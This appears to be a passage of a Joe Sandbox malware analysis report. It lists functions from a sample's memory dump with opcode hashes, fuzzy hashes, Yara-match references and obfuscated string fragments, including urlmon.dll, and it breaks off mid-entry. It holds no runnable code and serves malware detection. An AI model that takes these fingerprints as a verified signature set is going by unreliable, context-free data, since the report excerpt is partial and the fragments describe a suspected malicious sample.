                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2c58a360c0de9dc7a373e0bee972b50334e38d5de29b3ef381eda4472260049a
                                                            • Instruction ID: 220e7792f6c62b9daccef64184b0466f4ff893c81647cde6e04df4c65e228758
                                                            • Opcode Fuzzy Hash: 2c58a360c0de9dc7a373e0bee972b50334e38d5de29b3ef381eda4472260049a
                                                            • Instruction Fuzzy Hash: C531EE75A00208AFDB14DF99D940EEF77B9EF88710F10821AFD18A7341D774A911CBA0
                                                            Function 03A7E092 Relevance: .1, Instructions: 85COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2661831862.00000000039E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 039E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_39e0000_jfBrBcvTIMPfDU.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: cf6ed1507c048202a8380901b20853abf16bc6de9ff7b6f9047b8a115ef48fb3
                                                            • Instruction ID: 12962e26c988309b89c0392dbfe45f8ddcba0e35f2916ab43b63ae03b8fd1c78
                                                            • Opcode Fuzzy Hash: cf6ed1507c048202a8380901b20853abf16bc6de9ff7b6f9047b8a115ef48fb3
                                                            • Instruction Fuzzy Hash: B131FCB5A00609AFDB14DF59DD41EEFB7B9EF88300F10861AF918A7341E774A911CBA4
                                                            Function 03A7E9E2 Relevance: .1, Instructions: 77COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2661831862.00000000039E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 039E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_39e0000_jfBrBcvTIMPfDU.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5d70121d21914185a18db6d01ed80ca7d508067f521cbbc7796229021d8daec4
                                                            • Instruction ID: 091015cea0b579901a7a4b372f6130feeb84279305ce348003f197d3bbef0d8f
                                                            • Opcode Fuzzy Hash: 5d70121d21914185a18db6d01ed80ca7d508067f521cbbc7796229021d8daec4
                                                            • Instruction Fuzzy Hash: 82210CB5A00609AFDB14DF58DD41EAB77B8EF88700F10851AF918AB341E775A911CBA1
                                                            Function 03A6D462 Relevance: .1, Instructions: 75COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2661831862.00000000039E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 039E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_39e0000_jfBrBcvTIMPfDU.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 25b18df5678153bc5923fa7573696ab297a4478d8ab3a4e71ffa8f91d7ab67c5
                                                            • Instruction ID: 8af8cc657d3fa1ed6d5172f46da4dfd8de87afb54ae1b255972bf465d42afef0
                                                            • Opcode Fuzzy Hash: 25b18df5678153bc5923fa7573696ab297a4478d8ab3a4e71ffa8f91d7ab67c5
                                                            • Instruction Fuzzy Hash: 7011C2B63803047BF320EE158C83FAB775C9B95B50F248016FB08AE2C1E6A4F80547B4
                                                            Function 03A59392 Relevance: .1, Instructions: 65COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2661831862.00000000039E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 039E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_39e0000_jfBrBcvTIMPfDU.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9be72a19c9e0245c2c1c8c785e6486e1502920fbd8a387ee8b81c49a71c6fc8e
                                                            • Instruction ID: bf630dd1156069045427de11f15a8ea3b824944f0845a172cc9a06c9d42e7302
                                                            • Opcode Fuzzy Hash: 9be72a19c9e0245c2c1c8c785e6486e1502920fbd8a387ee8b81c49a71c6fc8e
                                                            • Instruction Fuzzy Hash: 3111257254A385DFEB11CBBCE844397BBA8EF66220F28129FF9898E081D3358056C751
                                                            Function 03A7DEA2 Relevance: .1, Instructions: 65COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2661831862.00000000039E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 039E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_39e0000_jfBrBcvTIMPfDU.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 46a6bf4ad95f33546e795f44d6ff258994b1487d7f7f38bc391b9097c11bbe26
                                                            • Instruction ID: 741fba5f2fd0fdfb980e4bdf74896668067a872978a1ba7dbbc83bca6385d58e
                                                            • Opcode Fuzzy Hash: 46a6bf4ad95f33546e795f44d6ff258994b1487d7f7f38bc391b9097c11bbe26
                                                            • Instruction Fuzzy Hash: 8A118E75A01304AFE720EF68CD45FEBB3ACEF85700F10461EF9186B241EB756A058BA0
                                                            Function 03A7DD22 Relevance: .1, Instructions: 65COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2661831862.00000000039E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 039E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_39e0000_jfBrBcvTIMPfDU.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 8cf869b84da2e677cde3e514bf77ca522b6e9b483428207a7ca8a5e1cae373bf
                                                            • Instruction ID: de351a016bf147bfd24a9e3d3636f702c627dec9209062e253684df41d229752
                                                            • Opcode Fuzzy Hash: 8cf869b84da2e677cde3e514bf77ca522b6e9b483428207a7ca8a5e1cae373bf
                                                            • Instruction Fuzzy Hash: 12116075A01704AFE720EF64CD45FEB73ACEF84700F10461EF9196B281EB756A058BA1
                                                            Function 03A76C32 Relevance: .1, Instructions: 59COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2661831862.00000000039E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 039E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_39e0000_jfBrBcvTIMPfDU.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 63f63e8f999b740cdbb74f0d65ac6bcd4b1d7f17212a4d24cebee56a7f62101b
                                                            • Instruction ID: fdecc9b01dc6ddec913b9b5aee50b589861811c8baaedb0e6a4f03a634cc3f50
                                                            • Opcode Fuzzy Hash: 63f63e8f999b740cdbb74f0d65ac6bcd4b1d7f17212a4d24cebee56a7f62101b
                                                            • Instruction Fuzzy Hash: 7601D6BAA003143BD710EB94CC85DEBB36CEF55210F040296FD589B341FA74AE5547E1
                                                            Function 03A591DA Relevance: .1, Instructions: 53COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2661831862.00000000039E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 039E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_39e0000_jfBrBcvTIMPfDU.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: cf8634709f6c80726a39731a647e1e53174cbad21379e31965701261575007c2
                                                            • Instruction ID: 922f6d6a99930d808ed120fbd3d0e1d42d67eda4bbbc0b4b7cd3a6b70bedebb0
                                                            • Opcode Fuzzy Hash: cf8634709f6c80726a39731a647e1e53174cbad21379e31965701261575007c2
                                                            • Instruction Fuzzy Hash: 4A1196B1D11229AF8B44CFA9988559EBBF8FA09620F14815FF818EA210D37596518FD0
                                                            Function 03A7ED52 Relevance: .0, Instructions: 47COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2661831862.00000000039E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 039E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_39e0000_jfBrBcvTIMPfDU.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9d128bd122eca586a97167fd92bb7d9fd6e9da7789e41deaed9ac37ac2debb71
                                                            • Instruction ID: 2e4ef44c3d6b7a885084050521c648e5bb06d3636e19e8579d3ea4c81f5b32e9
                                                            • Opcode Fuzzy Hash: 9d128bd122eca586a97167fd92bb7d9fd6e9da7789e41deaed9ac37ac2debb71
                                                            • Instruction Fuzzy Hash: F601CCB2200208BFCB14DE8DDC80EEB77ADAF8C710F408209BA09E7241D630F8518BA4
                                                            Function 03A59332 Relevance: .0, Instructions: 40COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2661831862.00000000039E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 039E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_39e0000_jfBrBcvTIMPfDU.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 11c40870e9ae16489f822b08ea30bc392231aef0b6716b2cc5a8eb4801c81416
                                                            • Instruction ID: f9c18eb5087eff4554d67227a1bbcf3a21f4ebc06d0a7b708e042e5d4178fb56
                                                            • Opcode Fuzzy Hash: 11c40870e9ae16489f822b08ea30bc392231aef0b6716b2cc5a8eb4801c81416
                                                            • Instruction Fuzzy Hash: 29F08273604216ABD7109B5DEC84B8BF79CEB99234F240227FD1C9A281E676E45183A0
                                                            Function 03A6D61D Relevance: .0, Instructions: 35COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2661831862.00000000039E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 039E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_39e0000_jfBrBcvTIMPfDU.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 25ecb6bf2a448980e5a57064e2dd1879b49d137cb7a586a0f03e4685d1d0a6e8
                                                            • Instruction ID: e9bcb78238e0fc7c42f321d848a2bcc378a25907c8e2e83455607e7db46a32c6
                                                            • Opcode Fuzzy Hash: 25ecb6bf2a448980e5a57064e2dd1879b49d137cb7a586a0f03e4685d1d0a6e8
                                                            • Instruction Fuzzy Hash: 85F096B59103187DDB10EBA4DD45EEA77389F84710F10838AE8096B281F6754A498B69
                                                            Function 03A7DFA2 Relevance: .0, Instructions: 33COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2661831862.00000000039E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 039E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_39e0000_jfBrBcvTIMPfDU.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4691c96d8d81143b437ca4f97799bd03263fa4e70748146f5b0961e75674bf37
                                                            • Instruction ID: bee376d039dc4ed1c683529613f108e6d547dbabfce986ccf9188286fd5034de
                                                            • Opcode Fuzzy Hash: 4691c96d8d81143b437ca4f97799bd03263fa4e70748146f5b0961e75674bf37
                                                            • Instruction Fuzzy Hash: A7F01C762042047FDB10DF99DD81E9B77ACEFC8750F00850AFA18A7241D770B9158BB0
                                                            Function 03A59326 Relevance: .0, Instructions: 31COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2661831862.00000000039E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 039E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_39e0000_jfBrBcvTIMPfDU.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0a68a83c35c46a4ca2618799fb84b818145daa91734f92d4a411b1a448a8017d
                                                            • Instruction ID: 9c1b864982288015c56abc6578a5cada247fdee9d0f7966dd6794b3f4573c346
                                                            • Opcode Fuzzy Hash: 0a68a83c35c46a4ca2618799fb84b818145daa91734f92d4a411b1a448a8017d
                                                            • Instruction Fuzzy Hash: 5BE0D832505227A7C7144F5DAC44486FB9CEA85230725022FF99C9B292DA328402C3D0
                                                            Function 03A6D582 Relevance: .0, Instructions: 29COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2661831862.00000000039E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 039E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_39e0000_jfBrBcvTIMPfDU.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: be98c509030c2ea581b490eed3ebf59809605963665b9a2a60d9c613e3bd7c53
                                                            • Instruction ID: 53aa802490ffb150c87fa283bd0b481d3a5dbe79edce21bbe1865be9ffe420bc
                                                            • Opcode Fuzzy Hash: be98c509030c2ea581b490eed3ebf59809605963665b9a2a60d9c613e3bd7c53
                                                            • Instruction Fuzzy Hash: 20F0827191520DEBDB14DF64D841BDEBBB8EB44320F1043AEE8259B280D63497508781
                                                            Function 03A7EC72 Relevance: .0, Instructions: 29COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2661831862.00000000039E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 039E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_39e0000_jfBrBcvTIMPfDU.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 649cf4263e1da267630c4240b949a5ff6783a0172db2a83d3ac15580329b4c67
                                                            • Instruction ID: 84f381a128ec9ff88cd92ef16f743e6278471f8a1d0188e6d981d5dcc4282ec2
                                                            • Opcode Fuzzy Hash: 649cf4263e1da267630c4240b949a5ff6783a0172db2a83d3ac15580329b4c67
                                                            • Instruction Fuzzy Hash: 2FE06D762043047FD714EE59DC44EAB77ACEFC4750F00400AF908A7241E630BA1087B4
                                                            Function 03A80B02 Relevance: .0, Instructions: 28COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2661831862.00000000039E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 039E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_39e0000_jfBrBcvTIMPfDU.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 473c746b910a85d1364797c5b8ce6b0ed0b6d8d67083c2f15317aaf68b8c99ac
                                                            • Instruction ID: 9a009f595b9eb2d950f0ecbf01f5fee8b901495d5f51ce5df4823181ed83c256
                                                            • Opcode Fuzzy Hash: 473c746b910a85d1364797c5b8ce6b0ed0b6d8d67083c2f15317aaf68b8c99ac
                                                            • Instruction Fuzzy Hash: 9FE04F36B4131437C220E7899C09FABB7ACDFD5A65F1A006AFE089B340E564E90482E5
                                                            Function 03A7E942 Relevance: .0, Instructions: 25COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2661831862.00000000039E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 039E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_39e0000_jfBrBcvTIMPfDU.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6a676e2e009e07708bbe963b130a833cbfc46acaa7b4dc646f7534d15dcc5b9e
                                                            • Instruction ID: 9aa48e65a5b4e0e85bf6376a91087aa7e3d720f590b92e77846630fbe8b572c2
                                                            • Opcode Fuzzy Hash: 6a676e2e009e07708bbe963b130a833cbfc46acaa7b4dc646f7534d15dcc5b9e
                                                            • Instruction Fuzzy Hash: 10E08C362002047BE220EB6ADD45FDB776CDFC5710F40811AFA08AB242D671BA1087B0
                                                            Function 03A6D57F Relevance: .0, Instructions: 25COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2661831862.00000000039E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 039E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_39e0000_jfBrBcvTIMPfDU.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 186e6c7721f9e7ab4cb97c2fe40417233b977bf3aeaacd3eae27a4da6970f6de
                                                            • Instruction ID: e59bcff5cc615287edaa157d7aa6c4c050b531bc1db41b3c82ab09ce81a419f4
                                                            • Opcode Fuzzy Hash: 186e6c7721f9e7ab4cb97c2fe40417233b977bf3aeaacd3eae27a4da6970f6de
                                                            • Instruction Fuzzy Hash: 69E06571915109EBDB14CF64D890E9EB7A4DF44354F1447AEE815DB640D23587908750
                                                            Function 03A60246 Relevance: .0, Instructions: 12COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2661831862.00000000039E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 039E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_39e0000_jfBrBcvTIMPfDU.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b992dc287589c840fd1f08b997669f393bafe7fa2c6efaf4d24503f7939eb7bb
                                                            • Instruction ID: 6f4bd70b5ad72c6e55a60026a1bb075550b4e4c9b85a8d95afbd59236334cc80
                                                            • Opcode Fuzzy Hash: b992dc287589c840fd1f08b997669f393bafe7fa2c6efaf4d24503f7939eb7bb
                                                            • Instruction Fuzzy Hash: 2CC08CE91185C69A0E23FB3416A09AA2F22456720436A15C0ECCA88307C5A0C5594109

                                                            Non-executed Functions

                                                            Function 03A77E42 Relevance: 34.0, Strings: 27, Instructions: 264COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2661831862.00000000039E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 039E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_39e0000_jfBrBcvTIMPfDU.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: $$$$%$)$)$.$5$>$B$E$F$F$H$J$Q$T$g$h$i$m$s$u$urlmon.dll$v$w$}$}
                                                            • API String ID: 0-1002149817
                                                            • Opcode ID: ce336ed1213236cd1af306e2b9385ac0025bfbbd7f3c3f5c4b04c9987333ccc7
                                                            • Instruction ID: 8d8bf7b1b6831cce7ce05b25fbf3ecaaea6ace54c9cef1082221a771785a6677
                                                            • Opcode Fuzzy Hash: ce336ed1213236cd1af306e2b9385ac0025bfbbd7f3c3f5c4b04c9987333ccc7
                                                            • Instruction Fuzzy Hash: 55C12FB1D01368AEDB61DFA4CD44BEEBBB9AF05304F0081DAD54CAB241E7B55A88CF51
                                                            Function 03A74CD2 Relevance: 26.5, Strings: 21, Instructions: 250COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2661831862.00000000039E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 039E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_39e0000_jfBrBcvTIMPfDU.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: $2$>3$I$I$\$e$g$i$l$l$m$o$r$r$r$r$t$t$t$x
                                                            • API String ID: 0-3810730746
                                                            • Opcode ID: 4cb72c4f02b5a757f16dbf16cd01f2e9c19f9f161888e6dfc108d135efd68fef
                                                            • Instruction ID: ec6d44aaf2e0e7c8ff2a944c7f1bc4d97275555b6d40fd4cc8685a7233c16df8
                                                            • Opcode Fuzzy Hash: 4cb72c4f02b5a757f16dbf16cd01f2e9c19f9f161888e6dfc108d135efd68fef
                                                            • Instruction Fuzzy Hash: B89170B5900318AEDB20DF948D84FFEB7B8AF45704F44419EE508AA241EB755B898FA1
                                                            Function 03A5FBB0 Relevance: 21.3, Strings: 17, Instructions: 88COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2661831862.00000000039E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 039E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_39e0000_jfBrBcvTIMPfDU.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: $=$($8^$=$L7$O5$Z$[$[$]$d&$fX$k^$q$y$}$4
                                                            • API String ID: 0-2955521445
                                                            • Opcode ID: 47d7064b2cb0d4fcb1e2eb3ebe04258ed3658283261e7028a725b8c347881e73
                                                            • Instruction ID: f0e687e1e920367dc0789514a93aca13df90c03fe2287c2f876895032f54b554
                                                            • Opcode Fuzzy Hash: 47d7064b2cb0d4fcb1e2eb3ebe04258ed3658283261e7028a725b8c347881e73
                                                            • Instruction Fuzzy Hash: BC5159B0C0566DCBFB24CF85C958BDEBBB5BB01308F108599C5593B281C7BA1A89CF91
                                                            Function 03A70462 Relevance: 16.4, Strings: 13, Instructions: 194COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2661831862.00000000039E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 039E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_39e0000_jfBrBcvTIMPfDU.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
                                                            • API String ID: 0-392141074
                                                            • Opcode ID: 0639b8236867b4e50c510351713e476aa8decf5e313ddfec55fef868a5996a94
                                                            • Instruction ID: 1084a7e007b603bd17b822a7787f73ff1020a375e7359cf0776c25fbcd0c9571
                                                            • Opcode Fuzzy Hash: 0639b8236867b4e50c510351713e476aa8decf5e313ddfec55fef868a5996a94
                                                            • Instruction Fuzzy Hash: 12712EB5800318BADB25EF94CC81FEFB778BF08700F04859EE519AA241E7755B488BA5
                                                            Function 03A7045F Relevance: 16.4, Strings: 13, Instructions: 177COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2661831862.00000000039E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 039E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_39e0000_jfBrBcvTIMPfDU.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
                                                            • API String ID: 0-392141074
                                                            • Opcode ID: 2349bba77284b97750d77158597ca85cbb2965ceb710e289a4c2be163f9d0ca9
                                                            • Instruction ID: d6c9b6f7769eae7698ea584ec77e20cb3242469d99e0bec97411d2daa64f1680
                                                            • Opcode Fuzzy Hash: 2349bba77284b97750d77158597ca85cbb2965ceb710e289a4c2be163f9d0ca9
                                                            • Instruction Fuzzy Hash: C5613DB5800318BADB25EFA4CC81FEFB778BF08700F04419EE519AA241E7755B488F61
                                                            Function 03A58FD3 Relevance: 16.3, Strings: 13, Instructions: 56COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2661831862.00000000039E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 039E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_39e0000_jfBrBcvTIMPfDU.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: "#CO$@Z\X$A\YO$A^[^$G$';$G7^^$ZA_A$ZA_O$Z\XA$Z\XA\Y$\Y$^V^Y$o
                                                            • API String ID: 0-1090279348
                                                            • Opcode ID: 8bf398c1f6df0004f33cfe62e41dbcf8f93f6e9b052fb992ad975e44d8103830
                                                            • Instruction ID: 9914e0a9ffd8a147a85b4f00479a1bac4f56acb85bf263c07a074d0c5dde755e
                                                            • Opcode Fuzzy Hash: 8bf398c1f6df0004f33cfe62e41dbcf8f93f6e9b052fb992ad975e44d8103830
                                                            • Instruction Fuzzy Hash: 8C21FBB0C01388AACB00CFE1E999ACDFBB4FB14344F208598D9697F201D3794A5A8F85
                                                            Function 03A58FE2 Relevance: 16.3, Strings: 13, Instructions: 47COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2661831862.00000000039E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 039E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_39e0000_jfBrBcvTIMPfDU.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: "#CO$@Z\X$A\YO$A^[^$G$';$G7^^$ZA_A$ZA_O$Z\XA$Z\XA\Y$\Y$^V^Y$o
                                                            • API String ID: 0-1090279348
                                                            • Opcode ID: 489c0bdeae624a86275dd8776972e1ccc461fb13837ecb1c8e2d6423adb1b2ad
                                                            • Instruction ID: 1cc1cc8592613c9bcd5e980194082ed310602c160dbaa30905eb75b6a8ecf010
                                                            • Opcode Fuzzy Hash: 489c0bdeae624a86275dd8776972e1ccc461fb13837ecb1c8e2d6423adb1b2ad
                                                            • Instruction Fuzzy Hash: C521CAB0C01388AACB14DFE5E9896CEBBB4FB14345F208598D9697F200D3754A5ACF85
                                                            Function 03A640E2 Relevance: 13.8, Strings: 11, Instructions: 84COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2661831862.00000000039E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 039E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_39e0000_jfBrBcvTIMPfDU.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: D$\$e$e$i$l$n$r$r$w$x
                                                            • API String ID: 0-685823316
                                                            • Opcode ID: cef077c8c834062b7e45f68ef546362afbaa761750952bba7d2f94da17f4a36f
                                                            • Instruction ID: 897c491f5d36a4ececb972337fac361af27e8ddf6eb05eb6978b93fc1caa66d1
                                                            • Opcode Fuzzy Hash: cef077c8c834062b7e45f68ef546362afbaa761750952bba7d2f94da17f4a36f
                                                            • Instruction Fuzzy Hash: AD2185B5D51318BAEF50DFD0CC45BEEBBB9BF08704F04815DE608BA280DBB556488BA4
                                                            Function 03A640DC Relevance: 13.8, Strings: 11, Instructions: 84COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2661831862.00000000039E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 039E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_39e0000_jfBrBcvTIMPfDU.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: D$\$e$e$i$l$n$r$r$w$x
                                                            • API String ID: 0-685823316
                                                            • Opcode ID: 80aa36b0a2161464359ca2ecc4f73393432f3e498ac326fcdb2117505e882905
                                                            • Instruction ID: c99bebe14d8ebfb0e9b400a2ac92c0c328df2165479cf67eb4458b64f5e02e64
                                                            • Opcode Fuzzy Hash: 80aa36b0a2161464359ca2ecc4f73393432f3e498ac326fcdb2117505e882905
                                                            • Instruction Fuzzy Hash: A22191B5D41318BAEF40DFD4CC85BEEBBB9BF08704F00814DE6147A280DBB556488BA4
                                                            Function 03A75192 Relevance: 12.8, Strings: 10, Instructions: 342COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2661831862.00000000039E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 039E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_39e0000_jfBrBcvTIMPfDU.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: :$:$:$A$I$N$P$m$s$t
                                                            • API String ID: 0-2304485323
                                                            • Opcode ID: e5687dc40e27f60ea3de246bb230497008122d410604eba7922c108c7d8b143d
                                                            • Instruction ID: ea1f150aff65e3e0828d9772d9210865a75b164ea1b48cee0c84977e3a7f6482
                                                            • Opcode Fuzzy Hash: e5687dc40e27f60ea3de246bb230497008122d410604eba7922c108c7d8b143d
